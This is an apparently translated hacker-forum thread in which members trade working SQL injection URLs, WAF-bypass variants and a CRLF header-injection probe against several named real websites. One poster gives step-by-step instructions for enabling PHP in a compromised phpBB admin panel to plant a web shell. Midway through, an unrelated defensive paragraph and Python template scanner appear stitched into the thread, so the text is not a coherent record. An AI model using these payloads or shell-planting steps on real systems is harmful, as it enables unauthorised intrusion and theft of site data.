Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    lightangel

    it's not vuln

    use logical expressions to check it, instead of "-"
     
    _________________________
    #18561 Konqi, 9 Dec 2011
    Last edited: 9 Dec 2011
  2. попугай

    попугай Elder

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    No.
     
  3. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Sorry for bringing back WAF topic.

    I have read all articles on SQL Injection in antichat so don't think should be given again.

    Code:
    http://www.worldstyling.com/web/product_detail.php?id=-95/*!UnIoN+SeLeCt*/1,2,3,4,5+--+
    Once I want to get union it tells Not Found, Not Found.
     
  4. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    www.allaboutjazz.com/php/article_archive.php'

    How do I work this one? Using spaces is flatly forbidden.

    www.allaboutjazz.com/php/article_archive.php'or(ExtractValue(1,concat(0x3a,version())))='1
    it says FUNCTION allaboutjazz.ExtractValue does not exist

    What other options could there be?
     
  5. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.worldstyling.com/web/product_detail.php?id=95/*!UnIoN!*/+/!*SeLeCt*!/1,2,3,4,5+--+
    tried all WAF solution, nothing comes.

    And also, checked source.
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.worldstyling.com/web/product_detail.php?id=95'+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+
     
    _________________________
  7. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    Folks, what is this?

    Code:
    http://foto4u.info/go.php?link=video&s=100&url=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    acunetix
     
  9. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    :) What can be done with this?
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    SomeCustomInjectedHeader

    translate it and think...
     
  11. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0

    Will it be possible to upload a shell?
     
  12. qaz

    qaz Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    PHP:
    http://www.gospelmp3.ru/artists/?id=-39%27+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x7061676573--+
    Why doesn't it output the columns?? (the output should be in the title)
     
  13. trololoman96

    trololoman96 Elder

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    It looks like where is being filtered; you can try working it like this:
    Code:
    http://www.gospelmp3.ru/news/?id=-115+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,table_name,column_name%29,9,10,11,12,13,14,15+from+information_schema.columns+limit+1,1--&n_action=read
    
    stepping through the limit until you find what you need; by hand it is tedious, of course, but I think throwing together a small script that dumps the structure is not a problem.
     
    1 person likes this.
  14. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    I have access to the admin panel on the phpbb engine, I can edit templates, how do I upload a shell there?? What code should I insert?
     
  15. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    134
    Likes Received:
    26
    Reputations:
    5
    Open the Administration section => General => Security
    Allow php in templates and save the settings
    Open the Administration section => Styles => Templates
    Next to the active template click "Edit"
    Select the template file into which you want to insert php, for example "overall_footer.html"
    Insert <?php ..... ?> in the desired place
     
    2 people like this.
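Seen from the defender's side, the steps in the post above leave a trace in the style files themselves: a template that should hold only markup now carries PHP. The following is an added example, not part of the thread or of phpBB, that scans template text for raw PHP open tags and for the phpBB 3.0 template directives `<!-- PHP -->` and `<!-- INCLUDEPHP ... -->`; the sample templates, marker names and the `.html`/`.htm` filter are constructed assumptions.

```python
import os
import re
import sys

# Markers that make a phpBB 3.0-style template carry executable PHP.
# The marker names are labels chosen for this example.
MARKERS = [
    ("raw-php-tag", re.compile(r"<\?(?!xml\b)", re.I)),           # <?php, <?=, <?
    ("phpbb-php-block", re.compile(r"<!--\s*PHP\s*-->", re.I)),
    ("phpbb-includephp", re.compile(r"<!--\s*INCLUDEPHP\s+\S+", re.I)),
]

# Constructed sample templates (not taken from any real board).
CLEAN_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<div class="copyright">{CREDIT_LINE}</div>\n'
    "<!-- INCLUDE overall_footer_extra.html -->\n"
)
MODIFIED_TEMPLATE = (
    '<div class="copyright">{CREDIT_LINE}</div>\n'
    "<?php /* constructed placeholder */ ?>\n"
    "<!-- PHP -->\n"
    "echo 1;\n"
    "<!-- ENDPHP -->\n"
    "<!-- INCLUDEPHP extra.php -->\n"
)

def scan_template(text):
    """Return (line_number, marker_name) pairs for every PHP marker found."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in MARKERS:
            if rx.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root):
    """Walk a styles directory; map each flagged template path to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".html", ".htm")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_template(fh.read())
                if hits:
                    report[path] = hits
    return report

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, hits)
```

Run against the board's styles directory on a schedule and diff the result against a known-good baseline; any hit in a stock template is worth an admin-log review.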
  16. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    It all comes out kind of crooked, and suppose I then upload a shell to the forum, where will it be located?
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    edit the FAQ template.. on the forum it will be forum.com/faq.php
     
    1 person likes this.
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Code:
    http://eafangames.com/live_score_tennis.php/flash_games_online.php
    ?channel=76'%00 order by 1--
    I can't understand what the problem is! Give me a hint!
     
  19. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    I edited it, still nothing works(( please give me the php code in PM)
     
  20. trololoman96

    trololoman96 Elder

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Code:
    http://eafangames.com/live_score_tennis.php/flash_games_online.php?channel=76'%29+union+select+@@version--%201#inscore_ifheight_xdc_500
    
    Done!
     
    1 person likes this.